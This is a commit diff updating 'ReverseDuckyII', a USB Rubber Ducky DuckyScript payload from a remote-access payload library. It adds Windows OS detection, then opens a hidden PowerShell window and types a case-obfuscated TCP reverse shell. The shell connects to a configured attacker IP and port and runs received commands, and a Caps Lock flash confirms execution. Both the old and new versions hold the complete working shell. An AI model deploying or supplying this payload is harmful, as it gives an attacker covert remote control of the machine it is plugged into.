Updated ReverseDucky2 to version 2

- Added DuckyScript 3.0 usage
- Inserting into non Windows machines, the Ducky won't execute the payload and will appear broken

payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt

@@ -1,27 +1,72 @@
-REM       ReverseDucky2
-REM       Version 1.3
-REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+REM       ReverseDuckyII
+REM       Version 2.0
+REM       OS: Windows / Multi
 REM       Author: 0iphor13
+REM       Requirement: DuckyScript 3.0
 
-REM       Reverse shell executed in the background
-REM       Fill in Attacker-IP and Port in Line 19
+REM       TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
+REM       If inserted into a non Windows machine, the Ducky will appear broken.
 REM       DON'T FORGET TO START LISTENER
 
+REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.0
 
-DELAY 1500
-GUI r
-DELAY 500
-STRING powershell -NoP -NonI -W hidden
-DELAY 250
-ENTER
+    REM Windows fully passive OS Detection and passive Detect Ready
+    REM Includes its own passive detect ready. Does not require
+    REM additional extensions
 
-DELAY 200
-STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
-DELAY 100
-STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
-DELAY 100
-STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
-DELAY 100
-ENTER
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+    REM $_OS will be set to WINDOWS or NOT_WINDOWS
 
+    REM CONFIGURATION:
+    DEFINE MAX_WAIT 150
+    DEFINE CHECK_INTERVAL 20
+    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE NOT_WINDOWS 7
 
+    VAR $MAX_TRIES = MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    ELSE
+        $_OS = NOT_WINDOWS
+    END_IF
+
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM IF ($_OS == WINDOWS) THEN
+    REM     STRING HELLO WINDOWS!
+    REM ELSE
+    REM     STRING HELLO WORLD!
+    REM END_IF
+END_EXTENSION
+
+REM Configure your settings below:
+REM Insert the attacking IP between '' & define your port
+DEFINE ATTACKER '192.168.178.25'
+DEFINE PORT 4444
+REM Set the default DELAY
+DEFINE WAIT 500
+
+IF ($_OS == WINDOWS) THEN
+    DELAY 1500
+    GUI r
+    DELAY WAIT
+    STRINGLN powershell -NoP -NonI -w h
+    DELAY WAIT
+    STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
+REM Capslock light will indicate a finished payload
+    CAPSLOCK
+ELSE
+    DELAY WAIT
+REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
+    ATTACKMODE OFF
+END_IF
+
+